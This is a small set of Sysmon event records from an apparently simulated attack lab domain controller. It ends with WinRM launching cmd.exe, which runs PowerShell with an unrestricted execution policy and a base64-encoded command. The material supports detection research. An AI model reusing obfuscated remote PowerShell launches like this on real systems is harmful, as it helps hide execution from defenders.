{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4353,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.032\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nSourceProcessId: 1312\r\nSourceThreadId: 1548\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-001017620600}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.032","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","SourceProcessId":"1312","SourceThreadId":"1548","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-001017620600}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4354,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.048\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 420\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.048","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"420","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4355,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.048\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 420\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.048","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"420","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4356,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.048\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 420\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.048","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"420","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4357,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.061\r\nProcessGuid: {41C8662E-20BB-5F25-0000-0010DB640600}\r\nProcessId: 4908\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20BB-5F25-0000-0020E0610600}\r\nLogonId: 0x661E0\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-20BB-5F25-0000-001017620600}\r\nParentProcessId: 4800\r\nParentImage: C:\\Windows\\System32\\winrshost.exe\r\nParentCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.061","ProcessGuid":"{41C8662E-20BB-5F25-0000-0010DB640600}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20BB-5F25-0000-0020E0610600}","LogonId":"0x661e0","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-20BB-5F25-0000-001017620600}","ParentProcessId":"4800","ParentImage":"C:\\Windows\\System32\\winrshost.exe","ParentCommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
